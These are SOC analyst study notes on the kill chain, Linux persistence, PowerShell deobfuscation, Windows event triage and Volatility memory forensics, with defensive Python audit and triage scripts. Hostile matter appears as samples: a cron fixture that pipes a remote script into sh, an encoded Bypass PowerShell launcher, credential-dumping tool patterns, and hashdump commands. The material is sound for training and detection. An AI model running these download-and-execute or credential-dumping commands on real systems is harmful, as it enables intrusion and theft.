CYBER KILL CHAIN
1. Operating system: services, processes, threads, users, group permissions, what is allowed to start together with Windows
Log types and important event IDs that come up frequently
2. Network security: important protocols, common attack techniques, analysing attacks on the network
3. Cyber kill chain: when an attacker has broken into a machine and starts scanning, which stage of the cyber kill chain does that map to?
How far along is the APT?
4. Logging: Sysmon, security, audit log, dhcp, http, system, application, terminal, smb, powershell, dns, bash command log (Linux), security (Linux: authentication, authorization, accounting), ssh (Linux): 4624, 4625...
For an attack from A -> B, what kinds of log appear on B, and what alerts fire?
5. Using our own products: how do you filter for a command? For example, to retrieve a DLL from a machine, which feature and which event do you use?
6. Process and principles for doing the tier 1 role well.
Show a real alert and analyse it to decide whether it is an attack, and which attack.
==========================================
Why study the Cyber Kill Chain and APTs?
APT vs targeted attacks?
- An APT is a targeted attack (it has a clearly defined objective).
- Persistent: tenacious, enduring until the goal is reached; backed by financial resources, manpower, time, ...
- Advanced: sophisticated, complex attack techniques that are hard to detect.
Cyber Kill Chain: you must understand which stage an alert belongs to.
There are three different schools of thought; Lockheed Martin's:
- Reconnaissance
- Weaponization: a payload that exploits a vulnerability, a file containing a malicious link (password spraying).
- Delivery: USB with autorun, email, web: SQLi (a malicious file uploaded to forums or social networks), OTT apps, SMS, media messages
- Exploitation: exploitation using pre-existing malware.
- Installation: hiding files
- Command and Control: reverse shell, bind shell, DNS tunneling, ICMP tunneling, TCP socket, remote desktop tunneling via 127.0.0.1 (port forwarding); logon type 10 with source 127.0.0.1 indicates remote desktop tunneling
https://cloud.google.com/blog/topics/threat-intelligence/bypassing-network-restrictions-through-rdp-tunneling/
- Actions on Objectives: sending files out exceeding 1 GB, sending many password-protected zip files out, dumping passwords
Use Google search to list 10 websites affected by a given CVE?
10 email accounts with the domain Viettel.com
List 10 websites exposing port 80/443 that run PHP.
Find and read some analyses of emails distributing malicious macros: try to set up a lab or read about it; create an Office file containing a malicious macro
On Linux, how many ways are there to start together with the system? cron jobs, SSH keys, local accounts, shell configuration modification?, the .bashrc file, webshells
https://www.cyberark.com/resources/threat-research-blog/persistence-techniques-that-persist
https://hackersploit.org/linux-red-team-persistence-techniques/
https://hadess.io/the-art-of-linux-persistence/
ssh from A -> B: the public key goes on B, we keep the private key
What is a collection of cron jobs called?
What do attackers usually use /etc/profile for?
preload -> related to rootkits, .so files
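The persistence locations listed above lend themselves to a scripted audit. The Python script below is an added example, not part of these notes or of the linked articles: it walks the cron, login-script, authorized_keys and ld.so.preload paths under a chosen root (a live system with root="/" or a mounted image), reports every entry it finds and marks lines that reference downloaders, encoded blobs or world-writable staging directories. The sample tree it builds, the 198.51.100.7 address (TEST-NET-2) and the key material are constructed for the demonstration.

```python
"""Audit the Linux autostart locations named in the notes (cron, SSH
authorized_keys, /etc/profile and shell rc files, ld.so.preload) under a
filesystem root, so the same checks run on a live host (root="/") or on a
mounted forensic image (root="/mnt/evidence")."""
import glob
import os
import re
import tempfile

# Shell fragments worth a second look in cron entries and login scripts:
# downloaders, decoders and world-writable staging directories.
SUSPICIOUS_RE = re.compile(
    r"(curl |wget |base64 -d|/dev/tcp/|/tmp/|/dev/shm/|chmod \+x|nohup )", re.IGNORECASE)

CRON_GLOBS = ["etc/crontab", "etc/cron.d/*", "var/spool/cron/crontabs/*", "var/spool/cron/*"]
LOGIN_GLOBS = ["etc/profile", "etc/profile.d/*.sh", "etc/bash.bashrc", "root/.bashrc",
               "root/.profile", "home/*/.bashrc", "home/*/.profile", "home/*/.bash_profile"]
AUTH_KEY_GLOBS = ["root/.ssh/authorized_keys", "home/*/.ssh/authorized_keys"]


def _files(root, patterns):
    """Yield existing regular files matching the patterns below root."""
    for pat in patterns:
        for path in sorted(glob.glob(os.path.join(root, pat))):
            if os.path.isfile(path):
                yield path


def _active_lines(path):
    """Non-empty, non-comment lines of a text file; unreadable files yield nothing."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return [ln.strip() for ln in fh if ln.strip() and not ln.lstrip().startswith("#")]
    except OSError:
        return []


def scan_persistence(root="/"):
    """Return findings as dicts with category, path (relative to root) and detail."""
    findings = []

    def add(category, path, detail):
        findings.append({"category": category,
                         "path": "/" + os.path.relpath(path, root), "detail": detail})

    # 1. ld.so.preload: every listed .so is injected into all dynamically linked
    #    programs, the userland rootkit technique the notes refer to.
    preload = os.path.join(root, "etc/ld.so.preload")
    for line in _active_lines(preload):
        add("ld_preload", preload, line)

    # 2. cron: every active entry is listed; suspicious ones get their own category.
    for path in _files(root, CRON_GLOBS):
        for line in _active_lines(path):
            add("cron_suspicious" if SUSPICIOUS_RE.search(line) else "cron_entry", path, line)

    # 3. login scripts (/etc/profile, .bashrc, ...) run at every login or shell
    #    start, so only lines matching the suspicious fragments are reported.
    for path in _files(root, LOGIN_GLOBS):
        for line in _active_lines(path):
            if SUSPICIOUS_RE.search(line):
                add("login_script", path, line)

    # 4. authorized_keys: an added public key is a passwordless way back in, so
    #    every key is reported with its comment for the analyst to confirm.
    for path in _files(root, AUTH_KEY_GLOBS):
        for line in _active_lines(path):
            parts = line.split()
            comment = parts[-1] if len(parts) > 2 else "(no comment)"
            add("ssh_key", path, f"{parts[0]} {comment}")
    return findings


def build_sample_image(root=None):
    """Write a small CONSTRUCTED filesystem tree for the demo and return its root.
    Nothing here comes from a real incident; the address is from TEST-NET-2."""
    root = root or tempfile.mkdtemp(prefix="persist-demo-")
    samples = {
        "etc/ld.so.preload": "/usr/local/lib/libdemo-hide.so\n",
        "etc/profile": "export PATH=/usr/local/bin:/usr/bin:/bin\n",
        "etc/cron.d/backup": "0 2 * * * root /usr/local/bin/backup.sh\n",
        "etc/cron.d/update": "*/5 * * * * root curl -s http://198.51.100.7/u.sh | sh\n",
        "home/alice/.bashrc": "alias ll='ls -la'\n/dev/shm/.cache/svc &\n",
        "home/alice/.ssh/authorized_keys":
            "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDEMOKEYMATERIALNOTREAL0000000000 unknown@host\n",
    }
    for rel, content in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for f in scan_persistence(build_sample_image()):
        print(f"{f['category']:16} {f['path']:36} {f['detail']}")
```

The cron check lists every active entry on purpose: on a real host most will be legitimate, and comparing the list against a known-good baseline is more reliable than the keyword heuristic alone.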
MITRE ATT&CK
Initial Access = Exploitation
Resource Development = Weaponization
Stages most often encountered in alerts: Recon, Persistence, Defense Evasion, Credential Access, Discovery, Lateral Movement,
which typical techniques exist and what alerts do they raise?
https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
https://www.sans.org/posters/hunt-evil/
Tool: impacket SMB server for lateral movement to another host.
What factors are needed for an attack from machine A -> B to succeed?
- a service must be exposed
- the victim must have a vulnerability
- SMB attack: account information (usually a privileged account): username & password, password hash, Kerberos ticket.
Privilege escalation:
https://info.veracode.com/rs/790-ZKW-291/images/privilege-escalaction-prevention-guide-2022-en.pdf
- scheduled tasks can also be used for privilege escalation
https://juggernaut-sec.com/scheduled-tasks/
https://www.crowdstrike.com/cybersecurity-101/living-off-the-land-attacks-lotl/
- ingress tool transfer: bitsadmin, powershell, wget, curl
LOL (living off the land): downloading files, spreading files, running in memory, sc.exe,
APT
Find 3-5 APT reports and grasp the kill chain: APT32 OceanLotus, Lazarus Group, Mustang Panda, Fancy Bear
---
https://blueteamlabs.online/home/challenges?category=ALL
https://ahmed-naser.medium.com/hacked-blue-team-challenge-walkthrough-write-up-86f3107b3af2
Q1-What is the system timezone?
/var/log/auth.log
Q2-Who was the last user to log in to the system?
Q3-What was the source port the user ‘mail’ connected from?
Q4-How long was the last session for user ‘mail’? (Minutes only)
Q10-Which user account was created by the attacker?
https://jawscyber.com/?p=38
Q4: Which PHP page is vulnerable to Remote File Inclusion (RFI)?
Memory Analysis – Ransomware
Using YARA To Verify Ransomware Flavour
https://jawscyber.com/?p=446
Create YARA rules with GHIDRA
https://www.youtube.com/watch?v=4Qo8aKi9aKw
Automatically create YARA rules
https://medium.com/@krzysztof.kuzin/btlo-write-up-eradication-809c5df070fb
SSH log
https://github.com/rehanoshba/writeups/blob/main/BTLO-%20Secure%20shell.pdf
https://sec.vnpt.vn/2024/02/review-wmi-tool/
https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/
# Phishing
https://medium.com/btlo-investigation-solutions/btlo-countdown-b7092360917f
Using key to decode database.
What is the filename(including extension) that is received as an attachment via email?
What is the GPS location of the blast? The format is the same as found in the evidence
## pdf
https://medium.com/@krzysztof.kuzin/btlo-write-up-sharpattack-2b4f7162ff65
# Browser
https://medium.com/@krzysztof.kuzin/btlo-write-up-poor-joe-78d1f568ef5f
What was downloaded?
What is the password of the user Joe?
What is the social media domain visited?
# Deobfuscation and Static Analysis
https://sec.vnpt.vn/2022/10/tong-quan-ve-phat-hien-ma-doc/
https://jawscyber.com/?p=126
https://medium.com/btlo-investigation-solutions/btlo-pretium-db6d8e8b3608
What is the default user agent being used for communications?
extract all of the data from these ping packets.
https://medium.com/btlo-investigation-solutions/btlo-malicious-powershell-analysis-350bee4606b6
https://medium.com/ce-digital-forensics/analysing-metasploit-framework-shellcode-e66b89411000
## Deobfuscate webshell
https://labs.detectify.com/how-to/tutorial-php-webshell-de-obfuscation/
### Beautify code
https://www.tutorialspoint.com/online_php_formatter.htm
### Convert hex
https://github.com/Chrissy-Morgan/PHP-Webshell-DeObfuscator
## Word
https://systemweakness.com/malware-analysis-of-a-emotet-word-document-6ccd1027fb2a
## Cheatsheet
https://bohansec.com/2021/04/30/Maclious-Powershell-Analysis-Video-Only/
decode text with CyberChef
https://medium.com/mii-cybersec/malicious-powershell-deobfuscation-using-cyberchef-dfb9faff29f
https://malware.news/t/deobfuscating-powershell-putting-the-toothpaste-back-in-the-tube/23509
https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
https://www.tevora.com/threat-blog/5-minute-forensics-decoding-powershell-payloads/
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-5.1
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-5.1
https://learn.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Utility/Set-Alias?view=powershell-5.1
```
powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C "$decodedScript = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABwAHIAbwBjAGUAcwBzACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAGMAYQBsAGMALgBlAHgAZQA='));Invoke-Expression $decodedScript"
```
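The one-liner above hides its real command in a UTF-16LE base64 blob, which is what the CyberChef and PowerShell deobfuscation links walk through by hand. The Python below is an added example (not from these notes or the linked articles) that automates the first pass: it pulls base64 blobs out of a command line, decodes them as UTF-16LE with a UTF-8 fallback, follows nested blobs, and lists the cmdlets and switches worth noting. The indicator table is a starting point, not a complete list; the sample command line is the one from the notes.

```python
"""Decode base64 payloads embedded in PowerShell launchers and flag the cmdlets
and switches an analyst looks for when triaging them."""
import base64
import re

# Candidate blobs: long runs of the base64 alphabet (short option values are ignored).
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Frequently seen in obfuscated launchers; matched as whole tokens, case-insensitively.
INDICATORS = {
    "Invoke-Expression": "executes the decoded string",
    "IEX": "alias of Invoke-Expression",
    "FromBase64String": "decodes an embedded payload",
    "-NonI": "non-interactive session",
    "-NoP": "profile scripts skipped",
    "Bypass": "execution policy bypass",
    "Hidden": "hidden window",
    "DownloadString": "fetches remote content",
    "Start-Process": "launches another program",
}

# Sample launcher from the notes (its payload starts calc.exe).
SAMPLE_CMDLINE = (
    'powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C "$decodedScript = '
    "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
    "'JABwAHIAbwBjAGUAcwBzACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAGMAYQBsAGMALgBlAHgAZQA='"
    '));Invoke-Expression $decodedScript"'
)


def decode_powershell_b64(blob):
    """Return the text of a PowerShell base64 blob, or None if it is not one.
    -EncodedCommand and [Text.Encoding]::Unicode payloads are UTF-16LE; the UTF-8
    fallback covers [Text.Encoding]::UTF8/ASCII. Only printable ASCII results are
    accepted, which keeps random base64-looking tokens out of the report."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    for codec in ("utf-16-le", "utf-8"):
        if codec == "utf-16-le" and len(raw) % 2:
            continue
        try:
            text = raw.decode(codec)
        except UnicodeDecodeError:
            continue
        if text and text.isascii() and all(c.isprintable() or c in "\r\n\t" for c in text):
            return text
    return None


def find_indicators(text):
    """Indicators present in text as whole tokens (so 'IEX' does not hit inside
    another word)."""
    hits = {}
    for token, meaning in INDICATORS.items():
        if re.search(r"(?<![\w-])" + re.escape(token) + r"(?![\w-])", text, re.IGNORECASE):
            hits[token] = meaning
    return hits


def triage_command_line(cmdline, max_depth=3):
    """Decode every base64 blob in the command line, then the blobs inside the
    decoded text (launchers are often nested), and collect indicators from all
    layers. Returns {"decoded": [...], "indicators": {...}}."""
    layers, queue = [], [cmdline]
    for _ in range(max_depth):
        new = []
        for text in queue:
            for blob in B64_RE.findall(text):
                decoded = decode_powershell_b64(blob)
                if decoded and decoded not in layers and decoded not in new:
                    new.append(decoded)
        if not new:
            break
        layers.extend(new)
        queue = new
    return {"decoded": layers,
            "indicators": find_indicators("\n".join([cmdline] + layers))}


if __name__ == "__main__":
    report = triage_command_line(SAMPLE_CMDLINE)
    for layer in report["decoded"]:
        print("decoded:", layer)
    for token, meaning in report["indicators"].items():
        print(f"indicator {token}: {meaning}")
```

For the sample, the decoded layer is `$process = Start-Process -FilePath calc.exe`; the indicators come from both the launcher (Invoke-Expression, FromBase64String, -NonI, -NoP, Bypass) and the payload (Start-Process).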
* Don’t block the IP just yet. You want to identify all affected systems and determine if multiple C2’s are being used. Attackers like Fin7 have been known to use between 3-5 different C2’s for a single attack. (**many C2**)
* Do a **quick investigation** on any other affected hosts, so that you can give them the ban-hammer all at once. Otherwise you could end up playing whack-a-mole for a while.
* Review logs for all devices that connect back to the attacker’s identified IP
* Review all internal connections to and from the affected host (especially SMB traffic)
* Review all external connections to and from the affected host (including DNS traffic)
* Multiple threat actors use DNS traffic for C2 and to avoid detection.
* Review the affected hosts for artifacts and persistence mechanisms (reg keys, scheduled tasks, emails, word docs, etc.)
* Review anomalous or suspicious activity from these hosts, such as connecting to dropbox, google docs, etc., to determine if data was exfiltrated.
* **Don’t start recovery until it’s certain the threat has been removed**. The last thing you want to do spend a ton of hours recovering (resetting passwords, reimaging, etc.) and then have to do it all over again for the same incident!
# IDA Analyst
https://medium.com/ce-malware-analysis/lab-5-ida-pro-bb7c7772dd99
https://medium.com/ce-malware-analysis/lab-6-c-code-constructs-in-assembly-e8f22078600c
# ELK
https://medium.com/@0x4C1D/try-hack-me-hunt-me-i-payment-collectors-walkthrough-5a26c86cd515
https://medium.com/@0x4C1D/try-hack-me-threat-hunting-foothold-walkthrough-845c3ec6723d
https://medium.com/@0x4C1D/try-hack-me-threat-hunting-pivoting-walkthrough-ebf1ab8b6a47
https://medium.com/@0x4C1D/try-hack-me-threat-hunting-endgame-walkthrough-18edf8565e9c
Commonly used techniques are listed below:
* Man-in-the-middle
* ARP / LLMNR Poisoning
* SMB Relay
* DHCP Spoofing
* Hijacking
* Traffic dump
* Keylogging
* Input capture
* Data collection from local/cloud/repositories
Some search examples
https://medium.com/@krzysztof.kuzin/btlo-write-up-soc-alpha-1-cacbdbaa617a
https://medium.com/@krzysztof.kuzin/btlo-write-up-soc-alpha-2-f60743a968f8
What is the full command used for bypassing the defender scan on the malicious file?
https://learn.microsoft.com/en-us/powershell/module/defender/add-mppreference?view=windowsserver2022-ps
What is the full path of the exe used for dumping password?
Add-MpPreference makes Windows Defender skip scanning a given file or folder (an exclusion).
```
Event_EventData_Image : (*mimi* OR *mimikatz* OR *procdump* OR *lsremora.dll* OR *lsremora64.dll* OR *dumpext.dll* OR *wceaux.dll* OR "mimidrv.sys")
```
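Two of the checks in these notes as code, added here as an example (not from the notes or the linked writeups): the image-name patterns from the query above applied to Sysmon process-creation events, and the "logon type 10 with source 127.0.0.1" sign of RDP tunnelling from the Command and Control bullet applied to Security 4624 events. The event records are constructed dicts holding a flattened subset of fields; the field names follow the Windows event schema, the host and user names are made up.

```python
"""Two checks from the notes, run over constructed Windows event records:
Sysmon process images matching the credential-dumping tool patterns, and
Security 4624 logons of type 10 (RemoteInteractive) whose source is the loopback
address, the RDP-tunnelling sign noted under Command and Control."""
import fnmatch
import ipaddress

# Patterns copied from the query above, matched case-insensitively against the
# full Image path and against its file name. "*mimi*" is deliberately broad.
DUMP_TOOL_PATTERNS = ["*mimi*", "*mimikatz*", "*procdump*", "*lsremora.dll*",
                      "*lsremora64.dll*", "*dumpext.dll*", "*wceaux.dll*", "mimidrv.sys"]

# Constructed sample events (not from a real incident): a flattened subset of
# Sysmon Event ID 1 and Security Event ID 4624 fields.
SAMPLE_EVENTS = [
    {"Channel": "Sysmon", "EventID": 1, "Computer": "WS01",
     "Image": r"C:\Users\Public\mimikatz.exe", "User": "CORP\\alice"},
    {"Channel": "Sysmon", "EventID": 1, "Computer": "WS01",
     "Image": r"C:\Tools\procdump64.exe", "User": "CORP\\alice"},
    {"Channel": "Sysmon", "EventID": 1, "Computer": "WS01",
     "Image": r"C:\Windows\System32\notepad.exe", "User": "CORP\\alice"},
    {"Channel": "Security", "EventID": 4624, "Computer": "SRV02",
     "LogonType": 10, "IpAddress": "127.0.0.1", "TargetUserName": "svc_backup"},
    {"Channel": "Security", "EventID": 4624, "Computer": "SRV02",
     "LogonType": 10, "IpAddress": "10.0.5.23", "TargetUserName": "bob"},
    {"Channel": "Security", "EventID": 4624, "Computer": "SRV02",
     "LogonType": 3, "IpAddress": "127.0.0.1", "TargetUserName": "SRV02$"},
]


def matches_dump_tool(image):
    """Return the first pattern the image path (or its file name) matches, or None."""
    name = image.lower()
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    for pat in DUMP_TOOL_PATTERNS:
        p = pat.lower()
        if fnmatch.fnmatchcase(name, p) or fnmatch.fnmatchcase(base, p):
            return pat
    return None


def is_loopback_rdp_logon(event):
    """Security 4624 with LogonType 10 (RemoteInteractive) from 127.0.0.1 or ::1:
    the RDP session arrived through a local port forward, so the event no longer
    shows the real client address."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 10:
        return False
    try:
        return ipaddress.ip_address(event.get("IpAddress", "")).is_loopback
    except ValueError:      # "-" or a missing address in some 4624 records
        return False


def triage(events):
    """Run both checks and return one finding dict per matching event."""
    findings = []
    for ev in events:
        if ev.get("Channel") == "Sysmon" and ev.get("EventID") == 1:
            pat = matches_dump_tool(ev.get("Image", ""))
            if pat:
                findings.append({"rule": "credential_dump_tool", "host": ev["Computer"],
                                 "detail": f"{ev['Image']} matched {pat}"})
        elif is_loopback_rdp_logon(ev):
            findings.append({"rule": "loopback_rdp_logon", "host": ev["Computer"],
                             "detail": f"{ev['TargetUserName']} type 10 from {ev['IpAddress']}"})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['rule']:22} {f['host']:6} {f['detail']}")
```

Note that the type 3 logon from 127.0.0.1 is not flagged: network logons from the local machine are routine, and it is the RemoteInteractive type combined with a loopback source that points at tunnelling.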
# Wireshark
https://www.linkedin.com/pulse/ph%C3%A2n-t%C3%ADch-h%C3%A0nh-vi-t%E1%BA%A5n-c%C3%B4ng-m%E1%BA%A1ng-th%C3%B4ng-qua-file-pcap-nguy%E1%BB%85n-%C4%91%E1%BB%A9c-t%E1%BA%A5n-yv0xc/
scdbg
http://sandsprite.com/blogs/index.php?uid=7&pid=152
https://medium.com/@bmaretyatp/malware-traffic-analysis-emotet-malware-e7abe00d7dc8
email activity
https://medium.com/@y0tz/malware-traffic-analysis-examining-emotet-infection-traffic-1357002076d2
# volatility
https://medium.com/@krzysztof.kuzin/btlo-write-up-poor-joe-78d1f568ef5f
What was downloaded?
PhotoRec to recover files
What is the password of the user Joe?
What is the social media domain visited?
What is the decryption id Joe has to use in order to decrypt the files
find which file was packed with UPX
find the malicious process with malfind
Compiled Date of the Malicious Executable.
https://medium.com/@krzysztof.kuzin/btlo-write-up-total-recall-c02b0885a734
mans file
The user tried to download an .exe file to the system but cancelled it. What was the filename?
What user accounts were created by the insider?
What service was enabled by the attacker
https://kcsc.edu.vn/tetctf-2024-write-up?fbclid=IwAR1yM0QvWucCUD-dgpkk6YM2vQZTyc8OYLhaq0wzjYuUXcBVrlbqHfx6bk4#heading-preface
.ad file
https://hackmd.io/@Automic-Kaiii/HkWmhmzH2#Linux-is-hurt #build profile
https://github.com/volatilityfoundation/volatility/wiki/Command-Reference
https://andreafortuna.org/2017/07/31/volatility-my-own-cheatsheet-part-6-windows-registry/
https://sbasu7241.medium.com/otterctf-2018-memory-forensics-write-up-part-2-14bf86e3ab94
clipboard (plugin) #copy-paste
https://odintheprotector.github.io/2023/09/20/hackthebox-truesecret.html
```
python vol.py -f <filename> imageinfo
python vol.py -f <filename> --profile=<profile_name> pslist
cmdline
python vol.py -f <filename> --profile=<profile_name> filescan | grep <sth>
```
MEMORY.DMP
## vol 3
```
python vol.py -f MEMORY.DMP windows.pslist
vol -f MEMORY.DMP windows.filescan > a.txt
vol.exe -f "MEMORY.DMP" windows.handles.Handles --pid 1736
vol -f MEMORY.DMP windows.dumpfiles --physaddr 0x7e3e2070
vol.exe -f "MEMORY.DMP" windows.dumpfiles --pid 1736
```
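Before dumping anything with the commands above, the suspicious process is usually narrowed down by eye against the "know normal, find evil" rules (the SANS poster linked earlier). The script below is an added example, not part of these notes or of the Volatility project: it parses windows.pslist text output and flags processes with an unexpected parent, an unexpected number of instances, or a name one edit away from a core Windows process. The pslist text is a constructed, shortened sample; the expected-parent table covers the common case and should be adjusted to the Windows version under analysis.

```python
"""Parse Volatility 3 windows.pslist text output and apply the 'know normal,
find evil' parent/child checks, so the suspicious process is narrowed down
before running malfind or dumping memory."""
import difflib
from collections import Counter

# Expected parents of core Windows processes (lower-case image names).
EXPECTED_PARENT = {
    "smss.exe": {"system", "smss.exe"},
    "csrss.exe": {"smss.exe"},
    "wininit.exe": {"smss.exe"},
    "winlogon.exe": {"smss.exe"},
    "services.exe": {"wininit.exe"},
    "lsass.exe": {"wininit.exe"},
    "svchost.exe": {"services.exe"},
}
# Processes whose parent normally exits, so a missing PPID is not suspicious.
ORPHAN_OK = {"csrss.exe", "wininit.exe", "winlogon.exe", "explorer.exe"}
SINGLE_INSTANCE = {"wininit.exe", "services.exe", "lsass.exe"}
KNOWN_NAMES = set(EXPECTED_PARENT) | {"system", "explorer.exe"}

# Constructed, shortened pslist output (real output has more columns and rows).
SAMPLE_PSLIST = """\
PID\tPPID\tImageFileName\tThreads
4\t0\tSystem\t90
348\t4\tsmss.exe\t2
452\t436\tcsrss.exe\t9
528\t436\twininit.exe\t1
536\t520\tcsrss.exe\t10
596\t520\twinlogon.exe\t3
656\t528\tservices.exe\t6
664\t528\tlsass.exe\t8
780\t656\tsvchost.exe\t12
812\t656\tsvchost.exe\t7
1204\t3000\tsvchost.exe\t5
2048\t1980\texplorer.exe\t40
2400\t2048\tlsas.exe\t2
2512\t2048\tsvchost.exe\t3
2600\t2048\tnotepad.exe\t1
2700\t2048\tlsass.exe\t2
"""


def parse_pslist(text):
    """Return {pid: {"ppid": int, "name": str}} from pslist text; header and
    progress lines (anything whose first field is not an integer) are skipped."""
    procs = {}
    for line in text.splitlines():
        fields = line.split("\t") if "\t" in line else line.split()
        if len(fields) < 3 or not fields[0].strip().isdigit():
            continue
        procs[int(fields[0])] = {"ppid": int(fields[1]), "name": fields[2].strip()}
    return procs


def find_anomalies(procs):
    """Apply the parent/child, instance-count and look-alike-name checks.
    Returns (pid, name, issue, detail) tuples."""
    findings = []
    counts = Counter(p["name"].lower() for p in procs.values())
    for pid, p in procs.items():
        name = p["name"].lower()
        parent = procs.get(p["ppid"])
        if name in EXPECTED_PARENT:
            if parent is None:
                if name not in ORPHAN_OK:
                    findings.append((pid, p["name"], "parent_missing",
                                     f"PPID {p['ppid']} not in process list"))
            elif parent["name"].lower() not in EXPECTED_PARENT[name]:
                findings.append((pid, p["name"], "unexpected_parent",
                                 f"parent is {parent['name']} (PID {p['ppid']})"))
        if name in SINGLE_INSTANCE and counts[name] > 1:
            findings.append((pid, p["name"], "multiple_instances",
                             f"{counts[name]} instances of {name}"))
        # Look-alike names (lsas.exe, svch0st.exe): the 0.85 cutoff is tight on
        # purpose; conhost.exe scores about 0.82 against svchost.exe.
        if name not in KNOWN_NAMES:
            close = difflib.get_close_matches(name, KNOWN_NAMES, n=1, cutoff=0.85)
            if close:
                findings.append((pid, p["name"], "lookalike", f"resembles {close[0]}"))
    return findings


if __name__ == "__main__":
    for pid, name, issue, detail in find_anomalies(parse_pslist(SAMPLE_PSLIST)):
        print(f"PID {pid:<6} {name:14} {issue:18} {detail}")
```

Feed it real output with `vol -f MEMORY.DMP windows.pslist > pslist.txt` and `parse_pslist(open("pslist.txt").read())`; the PIDs it flags are the ones to follow up with cmdline, handles and malfind.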
## Autopsy
https://medium.com/btlo-investigation-solutions/btlo-countdown-b7092360917f
## compare 2 snapshot file
regshot #tool
use for .hivu file
vmem file
## dump credential hashes
https://odintheprotector.github.io/2024/02/17/bitsctf2024-dfir.html
```
python3 volatility3-2.5.0/vol.py -f memdump-001.mem windows.hashdump
```
https://github.com/KMANVK/CTF_Wu/blob/main/MGCI-WLMAC%20Joint%20CTF%20Contest%20'21/Forgetful/solved.md
Recycle.Bin
https://www.4rth4s.xyz/2020/10/learning-memory-forensics-with.html
```
volatility -f <file_dump.raw> --profile=PROFILE hivelist
volatility -f <file_dump.raw> --profile=<profile> hashdump -y <SYSTEM offset> -s <SAM offset> > hashes.txt
volatility -f <file_dump.raw> --profile=Win7SP1x86_23418
```
cmdscan
vmem file
userassist (plugin) (Print userassist registry keys and information)
https://blog.bi0s.in/2020/08/04/Forensics/Investigation-InCTFi2020/ (another way get info from registry ntuser.dat)
```
volatility -f windows.vmem --profile=Win7SP1x64 dumpregistry -o 0xfffff8a00256d010 -D .
python vol.py -f exemplar17_1.vmem iehistory
```
https://odintheprotector.github.io/2023/09/20/hackthebox-truesecret.html
https://gist.github.com/1259iknowthat/8cb818f0a37566b1fc25151ef074d9af
tc file
https://www.varonis.com/blog/how-to-use-volatility
network
https://0xdf.gitlab.io/2019/09/07/htb-bastion.html
vhd file
```
guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/test
```
or use Autopsy
https://hackmd.io/@Automic-Kaiii/By6L3Qil2
vhdx file
https://github.com/Malandrone/PowerDecode?
```
python3 vol.py -f forensics.mem linux.bash
```
volatility_gpg: check whether the memory dump contains the passphrase
```
python3 vol.py -f forensics.mem -p volatility-gpg gpg_full
gpg --batch --yes -r "RansomKey" -o qgffrqdGlfhrdoE -e RxgXlDqP0h3baha
```
https://github.com/KMANVK/CTF_Trainee/blob/main/Task%201.md #find hostname
https://github.com/moaistory/WinSearchDBAnalyzer recover deleted records in Windows.edb
## browser history
https://medium.com/@huseyin.eksi/quick-forensics-on-google-chrome-c9fb3ffdc9ad
https://kcsc.edu.vn/tetctf-2024-write-up?fbclid=IwAR1yM0QvWucCUD-dgpkk6YM2vQZTyc8OYLhaq0wzjYuUXcBVrlbqHfx6bk4#heading-preface
https://systemweakness.com/extracting-saved-passwords-from-web-browser-1444dbfb6551
\Users\DuyTan-KMA\AppData\Local\Google\Chrome\User Data\Default\History
https://github.com/bquanman/CTF-Writeup/blob/main/ISITDTU%20CTF%20Final%202022/L34K%20-%20Misc(Forensics)%20-%20ISITDTUCTF%20Final%202022.md
https://github.com/KMANVK/CTF_Trainee/blob/main/Task%201.md
https://www.inversecos.com/2022/10/recovering-cleared-browser-history.html
https://odintheprotector.github.io/2024/01/28/tetctf2024-writeup.html
## dump the screen from a memory dump
https://www.rootusers.com/google-ctf-2016-forensic-for1-write-up/
# Incident response
https://www.acunetix.com/blog/articles/how-to-recover-from-a-hacked-website/